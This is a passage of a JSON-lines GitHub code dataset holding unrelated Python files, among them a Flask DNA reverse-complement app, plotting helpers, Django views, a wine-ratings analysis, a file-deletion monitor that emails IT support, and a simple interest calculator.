render_template(\"enter_sequence.html\")\r\n\r\n\r\n#route for uploading sequences as plain text file\r\n@app.route(\"/upload_file\", methods=[\"POST\",\"GET\"])\r\ndef upload_file():\r\n return render_template(\"upload_file.html\")\r\n\r\n\r\n#Display output of manually entered sequence\r\n@app.route(\"/enter_sequence_output\", methods=[\"POST\",\"GET\"])\r\ndef enter_sequence_output():\r\n flash(\"Input sequence:\\n\"+str(request.form['sequence_input']))\r\n output = revComp(str(request.form['sequence_input']))\r\n if output == \"error\":\r\n flash(\"Error: input sequence contains non-DNA characters\")\r\n else:\r\n flash(\"Reverse complement sequence:\\n\"+output)\r\n flash(\"Enter another sequence:\")\r\n return render_template(\"enter_sequence.html\")\r\n\r\n\r\n#Display output of file-uploaded sequence\r\n@app.route(\"/upload_file_output\", methods=[\"POST\",\"GET\"])\r\ndef upload_file_output():\r\n file = request.files[\"file\"]\r\n if file.filename[-4:]!='.txt':\r\n flash(\"Error: No files or wrong file type uploaded\")\r\n return render_template(\"upload_file.html\")\r\n else:\r\n\r\n input=file.read().decode('utf-8')\r\n flash(\"Input sequence:\\n\"+input)\r\n output = revComp(input)\r\n if output == \"error\":\r\n flash(\"Error: Input sequence contains non-DNA characters\")\r\n else:\r\n flash(\"Reverse complement sequence:\\n\"+output)\r\n return render_template(\"upload_file.html\")\r\n\r\n\r\n#Algorithm for calculating reverse complement of DNA sequence\r\ndef revComp(str):\r\n out = ''\r\n for i in str:\r\n if i == 'A':\r\n out='T'+out\r\n 
elif i == 'a':\r\n out='t'+out\r\n elif i == 'T':\r\n out='A'+out\r\n elif i == 't':\r\n out='a'+out\r\n elif i == 'C':\r\n out='G'+out\r\n elif i == 'c':\r\n out='g'+out\r\n elif i == 'G':\r\n out='C'+out\r\n elif i == 'g':\r\n out='c'+out\r\n elif i == ' ': #allow spaces\r\n pass\r\n else:\r\n return 'error'\r\n return out\r\n\r\n\r\nif __name__ == '__main__':\r\n port = int(os.environ.get(\"PORT\", 5000))\r\n app.run(debug=True, host='0.0.0.0', port=port)\r\n","repo_name":"kennethzhang315/MiniApp-ReverseComplementCalculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24550624887","text":"import itertools\nimport operator\nimport functools\nimport math\n\n\neps = 1e-200\ninf = float(\"inf\")\n\n\ndef readint():\n return int(input())\n\n\nk = readint()\nn = readint()\n\nv = []\ntotal_c = dict()\n\nfor i in range(n):\n a_i, b_i = map(int, input().split())\n v.append((a_i, b_i))\n total_c[b_i] = total_c.get(b_i, 0) + 1\n\nv = sorted(v)\n\ns_in = 0\ns_out = 0\n\nlast_x = dict()\nlast_i = dict()\ntotal_last = 0\ntotal = n\nlast = inf\nfor x, y in v:\n if y in last_x:\n s_in += (x - last_x[y]) * last_i[y] * (total_c[y] - last_i[y])\n if last != inf:\n s_out += (x - last) * total_last * (n - total_last)\n last_x[y] = x\n last_i[y] = last_i.get(y, 0) + 1\n total_last += 1\n last = x\n\ns_out -= s_in\nprint(\"{:d}\\n{:d}\".format(s_in * 2, s_out * 2))","repo_name":"notantony/ml2019-hw","sub_path":"cf/dists.py","file_name":"dists.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2537553275","text":"import hde\nimport numpy as np\nfrom pm import *\nfrom scipy.stats import ortho_group\nfrom graph_class import *\nfrom sbm import *\n\n# Test bfs distance function\n# Example graph represented as a list of NumPy arrays\ngraph = [\n np.array([1, 2]), # Node 0, neighbors: 1, 2\n np.array([0, 3, 4]), # Node 1, neighbors: 0, 3, 4\n np.array([0, 5]), # Node 2, neighbors: 0, 5\n np.array([1]), # Node 3, neighbor: 1\n np.array([1, 5]), # Node 4, neighbors: 1, 5\n np.array([2, 4]) # Node 5, neighbors: 2, 4\n]\n\n# Call BFS to compute shortest distance between nodes 0 and 5\nshortest_distance = hde.bfs_shortest_distance(graph, 0, 5)\nprint(\"Shortest distance between nodes 0 and 5:\", shortest_distance)\n\n# Test power method\nmin_eigv = 0\nmax_eigv = 10\ndim = 5\nd = np.random.uniform(min_eigv, max_eigv, dim)\nV = ortho_group.rvs(dim = dim)\nA = V@np.diag(d)@V.T\np = 2\nprint(\"Original eigenvectors: \")\nprint(np.sort(d))\nU = power_method(A,p, tol = 1e-7, test = True, mode = 1)\n\n# Test shortest path distances\nadj_list = [\n [1],\n [0,2],\n [1,3,5],\n [2,6],\n [5,7],\n [4,2],\n [3],\n [4]\n]\n\n# Perform BFS starting from node 0 and get the shortest path distances\nj = 7\nprint(len(adj_list))\nshortest_distances = bfs_shortest_path_distances(adj_list, j)\nprint(shortest_distances)\n\n# Print the shortest path distances\nfor i in range(len(adj_list)):\n print(\"Dist(\", j, \",\", i,\") = \", shortest_distances[i])\n \n# Testing SBM\nex22 = example22(1.0, 0.5, 5)\nprint(ex22)\nG = gen_sbm_graph(1.0, 0.5, 5)\nprint(G.adj_matrix)\nprint(G.degs)\nprint(G.laplacian)\nprint(G.adj_list)\n\n# # Test hde matrix\n# pwd = \"/Users/guifre/cla_project/cla-project-drawing-graphs-by-eigenvectors\"\n# f = open(pwd + \"/data/add20.txt\", \"r\")\n# G = Graph(f)\n# m = 4\n# X 
= hde.hde(G, m)\n# B = hde_matrix(G.laplacian, X)\n# print(B)\n\n\n\n \n \n \n \n\n# # Test case for Gershgorin bound\n# # Given matrix\n# matrix = np.array([[3, 1, 2, 4],\n# [0, 6, 2, 1],\n# [1, 0, 4, 2],\n# [2, 1, 0, 5]])\n\n# print(gershogorin_bound(matrix))\n","repo_name":"pauromeu/cla-project-drawing-graphs-by-eigenvectors","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11707959815","text":"from matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport torch\n\n\ndef get_verts_colors(verts, color=None):\n \"\"\"\n Args:\n color: either [r, g, b] with each color in [0, 1] or None\n if None, maps xyz as color\n \"\"\"\n if color is None:\n batch_size = verts.shape[0]\n colors = verts - verts.mean(1).unsqueeze(1)\n colors = colors / colors.norm(2, 2).max(1)[0].view(batch_size, 1, 1)\n colors = colors / 2 + 0.5\n else:\n colors = torch.ones_like(verts)\n colors[:, :, 0] = color[0] * colors[:, :, 0]\n colors[:, :, 1] = color[1] * colors[:, :, 1]\n colors[:, :, 2] = color[2] * colors[:, :, 2]\n return colors\n\n\ndef squashfig(fig=None):\n # TomNorway - https://stackoverflow.com/a/53516034\n if not fig:\n fig = plt.gcf()\n\n plt.subplots_adjust(0, 0, 1, 1, 0, 0)\n for ax in fig.axes:\n if isinstance(ax, Axes3D):\n ax.margins(0, 0, 0)\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.yaxis.set_major_locator(plt.NullLocator())\n ax.zaxis.set_major_locator(plt.NullLocator())\n else:\n ax.axis(\"off\")\n ax.margins(0, 0)\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.yaxis.set_major_locator(plt.NullLocator())\n","repo_name":"hassony2/handobjectconsist","sub_path":"meshreg/visualize/consistdisplay.py","file_name":"consistdisplay.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"44"} +{"seq_id":"39214611213","text":"from django.shortcuts import render,redirect,render_to_response\nfrom StudentInformationSystem.forms import PersonInfoForm\nfrom StudentInformationSystem.models import PersonalInfo\nfrom django.http import HttpResponse,HttpResponseRedirect\n\n\ndef index(request):\n\treturn HttpResponse(\"WELCOME TO STUDENT INFORMATION SYSTEM\")\n\n\ndef base(request):\n if request.method == \"POST\":\n form = PersonInfoForm(request.POST)\n if form.is_valid():\n PersonInfo = form.save(commit=False)\n PersonInfo.save()\n return redirect('success')\n else:\n form = PersonInfoForm()\n return render(request, 'StudentInformationSystem/base.html', {'form': form})\n\t\ndef display(request):\n try:\n Student = PersonalInfo.objects.all()\n except PersonalInfo.DoesNotExist:\n raise Http404(\"Comment does not exist\")\n \n return render(request, \"StudentInformationSystem/display.html\",{'Student': Student})","repo_name":"bvrit-wise-django-team/django_project_t4","sub_path":"resumebuildermodel/resume/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20930374561","text":"import pandas as pd \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as stats\nimport seaborn as sns\nfrom helper_functions import *\n\nif __name__ == '__main__':\n \n #use cleaning Class \n path = '~/galvanize/Capstone_1/git_info_wine_ratings/data/winemag-data-130k-v2.csv'\n cleaner = DataClean(path)\n 
cleaner.replace_val(86909, 'variety', 'Cabernet Sauvignon')\n cleaner.drop_null_rows(['country'])\n cols = ['country', 'description', 'points']\n df = cleaner.clean_df(cols)\n\n\n #make another column that counts the length of the description\n df['description_length'] = df['description'].str.len()\n\n\n #median is exactly 88\n med = np.median(df['points'])\n below_88_df = df[['points','description_length']][df['points'] < med]\n above_88_df = df[['points','description_length']][df['points'] > med]\n\n\n #add extra column for hue\n df['above_median_rating']=df['points']>med\n #look at all ratings at median\n All_but_88 = df[df['points']!=med]\n\n #VIOLIN PLOT\n fig, ax = plt.subplots(1, figsize=(12, 8))\n sns.violinplot('points', 'description_length', hue = 'above_median_rating', data = All_but_88, palette=\"Set2\", ax = ax)\n ax.set_title('Above and Below Median Vairance')\n plt.savefig('desc_per_rate_violin.png')\n #plt.show()\n\n \n p_val = stats.ttest_ind(below_88_df['description_length'], above_88_df['description_length'])[1]\n print(f'The p value is {p_val}.')\n\n correlation = stats.spearmanr(df['points'], df['description_length'])\n print(correlation)\n #cor coef = 0.5, p_val = 0\n\n\n below_des_med = df[['points','description_length']][df['description_length'] < 237]\n above_des_med = df[['points','description_length']][df['description_length'] > 237]\n\n fig, ax = plt.subplots(1)\n ax.scatter(below_des_med['description_length'], below_des_med['points'], color = 'blue', alpha = 0.5)\n ax.scatter(above_des_med['description_length'], above_des_med['points'], color = 'green', alpha = 0.5)\n ax.set_ylabel('Rating')\n ax.set_xlabel('Description Length')\n ax.set_title('Rating per Length of Description')\n plt.savefig('points_scatter_per_desc.png')\n plt.show()\n plt.close()\n\n p_val_desc = stats.ttest_ind(below_des_med['points'], above_des_med['points'])[1]\n\n fig, ax = plt.subplots(1)\n sns.scatterplot(below_des_med['description_length'], below_des_med['points'], x_jitter= True, ax = ax)\n sns.scatterplot(above_des_med['description_length'], above_des_med['points'], x_jitter= True, ax = ax)\n plt.show()\n\n","repo_name":"hberginc/wine_ratings_data_analysis","sub_path":"src/Description_hypothesis.py","file_name":"Description_hypothesis.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"29363511104","text":"#!/usr/bin/env python3\n# Author: Armit\n# Create Time: 2023/11/06\n\nfrom modules.assets import *\nfrom modules.ui_configs import *\n\nfrom .utils import *\n\n\ndef make_bloch_qubits(loader:Loader, parent:NodePath):\n # bloch sphere\n blochNP = loader.loadModel(MO_SPHERE_HIGHPOLY).copyTo(parent)\n blochNP.setTexture(loader.loadTexture(TX_PLASMA))\n blochNP.setTransparency(TransparencyAttrib.MAlpha)\n blochNP.setColor(1, 1, 1, BLOCH_ALPHA)\n blochNP.setR(BLOCH_SLOPE)\n blochNP.setScale(BLOCH_SIZE)\n\n # axis X\n lines = LineSegs()\n lines.setThickness(AXIS_THICKNESS)\n lines.setColor(0.7, 0, 0, 0.7)\n lines.moveTo(0, 0, 0)\n lines.drawTo(+10, 0, 0)\n lines.drawTo(-10, 0, 0)\n axisNP = NodePath(lines.create())\n axisNP.setTextureOff()\n axisNP.reparentTo(blochNP)\n\n # axis Y\n lines = LineSegs()\n lines.setThickness(AXIS_THICKNESS)\n lines.setColor(0, 0.7, 0, 0.7)\n lines.moveTo(0, 0, 0)\n lines.drawTo(0, +10, 0)\n lines.drawTo(0, -10, 0)\n axisNP = NodePath(lines.create())\n axisNP.setTextureOff()\n axisNP.reparentTo(blochNP)\n\n # axis Z\n lines = LineSegs()\n 
lines.setThickness(AXIS_THICKNESS)\n lines.setColor(0.0, 0, 0.7, 0.7)\n lines.moveTo(0, 0, 0)\n lines.drawTo(0, 0, +10)\n lines.drawTo(0, 0, -10)\n axisNP = NodePath(lines.create())\n axisNP.setTextureOff()\n axisNP.reparentTo(blochNP)\n\n # qubit Alice\n qubit1NP = loader.loadModel(MO_SPHERE).copyTo(blochNP)\n qubit1NP.setTextureOff()\n qubit1NP.setTransparency(TransparencyAttrib.MAlpha)\n qubit1NP.setColor(*QUBIT_COLOR_ALICE)\n qubit1NP.setPos(0, QUBIT_OFFSET, 0)\n qubit1NP.setScale(QUBIT_SIZE)\n\n # qubit Bob\n qubit2NP = loader.loadModel(MO_SPHERE).copyTo(blochNP)\n qubit2NP.setTextureOff()\n qubit2NP.setTransparency(TransparencyAttrib.MAlpha)\n qubit2NP.setColor(*QUBIT_COLOR_BOB)\n qubit2NP.setPos(0, QUBIT_OFFSET, 0)\n qubit2NP.setScale(QUBIT_SIZE)\n\n return (blochNP, qubit1NP, qubit2NP), []\n","repo_name":"Kahsolt/Quantum-Chase-Game","sub_path":"client/modules/prefabs/bloch_qubit.py","file_name":"bloch_qubit.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74789509571","text":"#!/usr/bin/env python\n#^ used for the watchdog module to be recognised.\n\n'''\n\nAuthor: Joe Richards\n\nCreated Date: 28/02/2018\n\nPython Version 2.7\n\n'''\n\n#Import the modules.\nimport logging\nimport sys\nimport time\nimport smtplib\nfrom watchdog.events import FileSystemEventHandler\nfrom watchdog.observers import Observer\n\n#Set the global strings.\nglobal sendSMTP\nglobal logFile\nglobal fileName\n\n#Send smtp emails within Office365.\ndef sendsmtp(msgText):\n server = smtplib.SMTP(\"mail.messaging.microsoft.com\")\n message = 'Subject: {}\\n\\n{}'.format(\"Path Monitor\", msgText)\n server.sendmail(\"itsupport@\", \"itsupport@\", message)\n server.quit()\n\n#Class for the watchdog monitor.\nclass monitorEvents(FileSystemEventHandler):\n #global variables needed within the class.\n global sendSMTP\n global logFile\n global fileName\n\n #Check the parameter arguemtns.\n def logger(self):\n #Check to see if logging to file is enabled or not and if so adds the file path and name to filename= within the logging.\n if (logFile == \"True\"):\n logging.basicConfig(level=logging.DEBUG,filename=fileName,format=\"%(asctime)s : %(message)s\")\n print(\"logging to file.\")\n else:\n print(\"Not logging to file.\")\n\n #Check to see if logging to email is enabled or not.\n if(sendSMTP != \"True\"):\n print(\"Not logging to email.\")\n else:\n print(\"Logging to email.\")\n\n def catch_all_handler(self, event):\n #Log to the the log file.\n if (logFile == \"True\"):\n logging.debug(event)\n \n def on_moved(self, event):\n self.catch_all_handler(event)\n \n def on_created(self, event):\n self.catch_all_handler(event)\n \n def on_deleted(self, event):\n #self.catch_all_handler(event)\n #Prints on screen.\n print(event)\n \n #Log to the the log file.\n if (logFile == \"True\"):\n logging.debug(event)\n \n #Sends email if argument is true.\n if(sendSMTP == \"True\"):\n #Send email.\n sendsmtp(event)\n \n def on_modified(self, event):\n self.catch_all_handler(event)\n\n#Start the monitoring process.\ndef monitor(path):\n #Stores the class.\n monitor_events = monitorEvents()\n #Runs the logger function for checking to see if logging to file is enabled.\n monitor_events.logger()\n \n observer = Observer()\n observer.schedule(monitor_events, path, recursive=True)\n observer.start() \n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n\n#Main program.\ndef main():\n 
#global variables needed within the function.\n global sendSMTP\n global logFile\n global fileName\n \n #Check if there is four arguments written in by the user.\n #The first argument is the name of the python script.\n #The second argument is the directory in which is being listened.\n #The third argument is if you want to send an email true/false.\n #The fourth argument is log to a file true/false.\n #The fith argument is the file name.\n if (len(sys.argv) == 5 and sys.argv[2] == \"true\" or sys.argv[2] == \"false\" and sys.argv[3] == \"true\" or sys.argv[3] == \"false\" and sys.argv[4] != None):\n #Splits and stores the arguements into strings.\n path = sys.argv[1]\n SMTP = sys.argv[2]\n log = sys.argv[3]\n fileName = sys.argv[4]\n \n #Check if its sending email is true or false.\n if(SMTP.upper() == \"TRUE\"):\n sendSMTP = \"True\"\n else: \n sendSMTP = \"False\"\n \n #Check if the program is logging to a file.\n if (log.upper() == \"TRUE\"):\n logFile = \"True\"\n else:\n logFile = \"False\"\n \n #Monitor the path given in the argument.\n monitor(path) \n else:\n #Print an error if it doe not match the format.\n print(sys.stderr, \"Argument error. Usage: SMTPSending:true/false> \")\n\n#Starts the program.\nmain()\n\n\n\n\n'''\nExample of the program running;\n\nC:\\Python27>PathMonitor.py C:\\ true true file\nlogging to file.\nLogging to email.\n\n\n\n\n\n\n\nExample of file created.\n\n2018-02-28 14:18:06,979 : \n2018-02-28 14:18:09,986 : \n2018-02-28 14:18:10,513 : \n\n\n\nExample of email\n\n\n\n---\nThis email has been checked for viruses by ...\n\n\n\nExample of program failing on arguments.\n\nC:\\Python27>PathMonitor.py C:\\ false f file\n(', mode 'w' at 0x0222D0D0>, 'Argument error. Usage: SMTPSending:true/false> ')\n\n\n'''\n\n\n\n","repo_name":"jddavies89/SysOps","sub_path":"Python/PathMonitor.py","file_name":"PathMonitor.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3651562974","text":"from pyface.qt import QtGui, QtCore\nimport matplotlib\n\nfrom traitsui.qt4.editor import Editor\nfrom traitsui.qt4.basic_editor_factory import BasicEditorFactory\nfrom traitsui.api import Handler\n\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4 import NavigationToolbar2QT\n\n\nclass _MPLSimFigureEditor(Editor):\n scrollable = True\n\n def init(self, parent):\n self.control = self._create_canvas(parent)\n#\t\tself.set_tooltip()\n\n def update_editor(self):\n pass\n\n def _create_canvas(self, parent):\n \"\"\" Create the MPL canvas. \"\"\"\n # matplotlib commands to create a canvas\n frame = QtGui.QWidget()\n mpl_canvas = FigureCanvas(self.value)\n mpl_canvas.setParent(frame)\n#\t\tmpl_toolbar = NavigationToolbar2QT(mpl_canvas,frame)\n\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(mpl_canvas)\n#\t\tvbox.addWidget(mpl_toolbar)\n frame.setLayout(vbox)\n return frame\n\nclass MPLSimFigureEditor(BasicEditorFactory):\n klass = _MPLSimFigureEditor\n\n\nclass _MPLFigureEditor(Editor):\n scrollable = True\n\n def init(self, parent):\n self.control = self._create_canvas(parent)\n self.set_tooltip()\n\n def update_editor(self):\n pass\n\n def _create_canvas(self, parent):\n \"\"\" Create the MPL canvas. 
\"\"\"\n # matplotlib commands to create a canvas\n frame = QtGui.QWidget()\n mpl_canvas = FigureCanvas(self.value)\n mpl_canvas.setParent(frame)\n mpl_toolbar = NavigationToolbar2QT(mpl_canvas,frame)\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(mpl_canvas)\n vbox.addWidget(mpl_toolbar)\n frame.setLayout(vbox)\n return frame\n\nfrom matplotlib.widgets import AxesWidget\n\nclass MPLFigureEditor(BasicEditorFactory):\n klass = _MPLFigureEditor\n\n def setup_mpl_events(self):\n self.image_axeswidget = AxesWidget(self.image_axes)\n self.image_axeswidget.connect_event('motion_notify_event', self.image_on_motion)\n #self.image_axeswidget.connect_event('figure_leave_event', self.on_cursor_leave)\n #self.image_axeswidget.connect_event('figure_enter_event', self.on_cursor_enter)\n wx.EVT_RIGHT_DOWN(self.image_figure.canvas, self.on_right_down)\n\n def on_right_down(self, event):\n if self.image_popup_menu is None:\n menu = wx.Menu()\n\n def image_on_motion(self, event):\n if event.xdata is None or event.ydata is None:\n return\n\n#cid = fig.canvas.mpl_connect('button_press_event', onclick)\n\nfrom traits.etsconfig.api import ETSConfig\nETSConfig.toolkit = 'qt4'\n\nmatplotlib.rcParams['backend.qt4']='PySide'\nclass MPLInitHandler(Handler):\n \"\"\"Handler calls mpl_setup() to initialize mpl events\"\"\"\n\n def init(self, info):\n \"\"\"This method gets called after the controls have all been\n created but before they are displayed.\n \"\"\"\n info.object.mpl_setup()\n return True\n\n\nfrom matplotlib.widgets import LassoSelector\nfrom matplotlib.path import Path\n\nimport numpy as np \nclass SelectFromCollection(object):\n \"\"\"Select indices from a matplotlib collection using `LassoSelector`.\n\n Selected indices are saved in the `ind` attribute. This tool fades out the\n points that are not part of the selection (i.e., reduces their alpha\n values). 
If your collection has alpha < 1, this tool will permanently\n alter the alpha values.\n\n Note that this tool selects collection objects based on their *origins*\n (i.e., `offsets`).\n\n Parameters\n ----------\n ax : :class:`~matplotlib.axes.Axes`\n Axes to interact with.\n\n collection : :class:`matplotlib.collections.Collection` subclass\n Collection you want to select from.\n\n alpha_other : 0 <= float <= 1\n To highlight a selection, this tool sets all selected points to an\n alpha value of 1 and non-selec ted points to `alpha_other`.\n \"\"\"\n\n def __init__(self, ax, collection, alpha_other=0.3):\n \n\n self.canvas = ax.figure.canvas\n self.collection = collection\n self.alpha_other = alpha_other\n\n self.xys = collection.get_offsets() #works for scatter\n #self.xys = np.array(collection.get_data()).T # works for plot\n self.Npts = len(self.xys)\n\n # Ensure that we have separate colors for each object\n self.fc = collection.get_facecolors()\n if len(self.fc) == 0:\n raise ValueError('Collection must have a facecolor')\n elif len(self.fc) == 1:\n self.fc = np.tile(self.fc, (self.Npts, 1))\n\n self.lasso = LassoSelector(ax, onselect=self.onselect)\n self.ind = []\n\n def onselect(self, verts):\n path = Path(verts)\n self.ind = np.nonzero(path.contains_points(self.xys))[0]\n self.fc[:, -1] = self.alpha_other\n self.fc[self.ind, -1] = 1\n self.collection.set_facecolors(self.fc)\n self.canvas.draw_idle()\n\n def disconnect(self):\n self.lasso.disconnect_events()\n self.fc[:, -1] = 1\n self.collection.set_facecolors(self.fc)\n self.canvas.draw_idle()\n","repo_name":"limu007/scanner","sub_path":"my_editors.py","file_name":"my_editors.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28675174740","text":"#! 
/usr/bin/python3\n'''\n Client - calls server, opens file, sends server data line by line.\n'''\n\n\nimport socket\n\n\ndef connect(host, port):\n\n with open('input.txt', 'rt') as infile:\n lines = infile.read().split('\\n')\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect((host, port))\n print('Connected to %s:%s' % (host, port))\n\n for line in lines[:-1]:\n\n print('\\tSending:\\t%s' % line)\n sock.send(line.encode('utf-8'))\n\n data = sock.recv(1024)\n print('\\tReceived:\\t%s' % data.decode())\n\n print('Finished, connection closed.')\n\n\nif __name__ == '__main__':\n\n host = '127.0.0.1'\n port = 9000\n\n connect(host, port)\n","repo_name":"okimin/operatingsystemclass","sub_path":"SampleCode/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35474698504","text":"from sys import stdin\ns = stdin.readline().rstrip()\nalpha = [-1] * 26\nfor i in range(len(s)):\n\tif alpha[ord(s[i])-97] == -1 :\n\t\talpha[ord(s[i])-97]=i\nprint(\" \".join(map(str,alpha)))\n\n#다른사람 풀이\n\n# s = input();print(*[s.find(chr(97+i)) for i in range(26)])","repo_name":"LeeJeongHwi/Algorithm","sub_path":"Algorithm/BaekJoon/입출력/10809-알파벳찾기.py","file_name":"10809-알파벳찾기.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22521078823","text":"from defines import Config\nimport copy\n\nclass Player:\n def __init__(self, map, n, m, obs_range, init_pos, obs):\n self.n, self.m, self.obs_range = n, m, obs_range\n self.map = copy.deepcopy(map)\n self.cur_x, self.cur_y = init_pos\n self.init_heuristic_map()\n self.obs = obs\n\n def is_in_range(self, x, y):\n return x >= 0 and x < self.n and y >= 0 and y < self.m\n\n def push(self, obs_id, direction):\n x, y = direction\n for ox, oy in self.obs[obs_id]:\n nx, ny = ox + x, oy + y\n if self.map[nx][ny] in [Config.WALL, Config.OBS, Config.SEEKER, Config.HIDER]:\n return False # not pushable\n for ox, oy in self.obs[obs_id]:\n nx, ny = ox + x, oy + y\n self.map[ox][oy] = Config.VERIFIED\n self.map[nx][ny] = Config.OBS\n self.obs[obs_id] = (nx, ny)\n return True\n\n def is_pregame(self, turn):\n return turn < Config.PREGAME_TURN\n\n def is_observable(self, i, j):\n x, y = self.cur_x, self.cur_y\n if x == i and y == j:\n return True\n if not(abs(i - x) <= self.obs_range and abs(j - y) <= self.obs_range):\n return False\n if (abs(i - x) + abs(j - y) < 2):\n return True\n if (i == x):\n return self.observe_horizontal(id, i, j)\n if (j == y):\n return self.observe_vertical(id, i, j)\n if (abs(x - i) == abs(y - j)):\n return self.observe_diagonal(id, i, j)\n if (abs(i - x) + abs(j - y) == 3):\n return self.observe_second_layer(i, j)\n return self.observe_odd_cases(id, i, j)\n\n def observe_second_layer(self, i, j):\n x, y = self.cur_x, self.cur_y\n if abs(x - i) == 2:\n tx = (x + i) // 2\n return not (self.map[tx][j] in [Config.WALL, Config.OBS])\n else:\n ty = (y + j) // 2\n return not (self.map[i][ty] in [Config.WALL, Config.OBS])\n\n def observe_horizontal(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n for k in range(min(y, j), max(y, j)):\n if self.map[x][k] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def observe_vertical(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n for k in range(min(x, i), max(x, i)):\n if self.map[k][y] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n 
def observe_diagonal(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n for k in range(min(i, x) + 1, max(i, x)):\n if (x - i) * (y - j) > 0:\n if self.map[k][min(j, y) + k - min(x, i)] in [Config.WALL, Config.OBS]:\n return False\n else:\n if self.map[k][max(j, y) + min(x, i) - k] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def observe_odd_cases(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n if abs(x - i) == 3:\n if self.map[x-1*(x-i)//abs(x-i)][j+(y-j)//abs(y-j)] in [Config.WALL, Config.OBS] or \\\n self.map[x-2*(x-i)//abs(x-i)][y-(y-j)//abs(y-j)] in [Config.WALL, Config.OBS]:\n return False\n else:\n if self.map[i+(x-i)//abs(x-i)][y-1*(y-j)//abs(y-j)] in [Config.WALL, Config.OBS] or \\\n self.map[x-(x-i)//abs(x-i)][y-2*(y-j)//abs(y-j)] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def init_heuristic_map(self):\n self.hmap = [[0] * self.m for _ in range(self.n)]\n for i in range(self.n):\n for j in range(self.m):\n if self.map[i][j] in [Config.EMPTY]:\n self.hmap[i][j] = self.__count_nonempty_adj(i, j)\n\n def __count_nonempty_adj(self, i, j):\n cnt = 0\n for direction in Config.DIR:\n x, y = i + direction[0], j + direction[1]\n if x < 0 or x >= self.n or y < 0 or y >= self.m:\n continue\n cnt += int(self.map[x][y] in [Config.WALL, Config.OBS])\n return cnt","repo_name":"tlphat/CS420-Project-1-Hide-and-Seek","sub_path":"level4/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"40664216816","text":"import math\r\na=float(input(\"Primul nr\"))\r\nb=float(input(\"Al doilea nr\"))\r\nc=float(input(\"Al 3 nr\"))\r\n\r\ndelta=float\r\nx1=float\r\nx2=float\r\n\r\ndelta=(b**2)-(4*a*c)\r\nif delta>0:\r\n delta=math.sqrt(delta)\r\n x1=(-b+delta)/2*a\r\n x2=(-b-delta)/2*a\r\n\r\n print(\"X1 este:\",x1)\r\n print(\"X2 este:\",x2)\r\nelse:\r\n print(\"unsolvable\")\r\n\r\n","repo_name":"Bogdan119/M.A.P","sub_path":"lab1/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32994491604","text":"#coding: utf-8\n\nimport sys\nimport math\n\ndef yearRate2DayRate(yearRate, day_of_year = 360):\n #base = xx\n #base * (1 + yearRate) = base * (1 + dayRate)^n\n dayRate = math.pow(1 + yearRate, 1.0 / day_of_year) - 1\n return dayRate\n\ndef calcTotalByDays(base, yearRate, days):\n dayRate = yearRate2DayRate(yearRate)\n total = base * math.pow(1 + dayRate, days)\n return total\n\ndef yearRate2MonthRate(yearRate):\n #base = xx\n #base * (1 + yearRate) = base * (1 + monthRate)^12\n monthRate = math.pow(1 + yearRate, 1.0 / 12) - 1\n return monthRate\n\ndef calcTotalByMonths(base, yearRate, months):\n monthRate = yearRate2MonthRate(yearRate)\n total = base * math.pow(1 + monthRate, months)\n return total\n\ndef calcTotalByFreqInput(inputBase, freqDays = 30, yearRate = 0.04, days = 360):\n daysLeft = days\n totalBase = 0\n total = 0\n while (daysLeft > 0):\n totalBase += inputBase\n total += calcTotalByDays(inputBase, yearRate, daysLeft)\n daysLeft -= freqDays\n return totalBase,total,total-totalBase\n\ndef calcTotalByFreqInput_Month(inputBase, freqMonth = 1, yearRate = 0.04, months = 12):\n monthsLeft = months\n 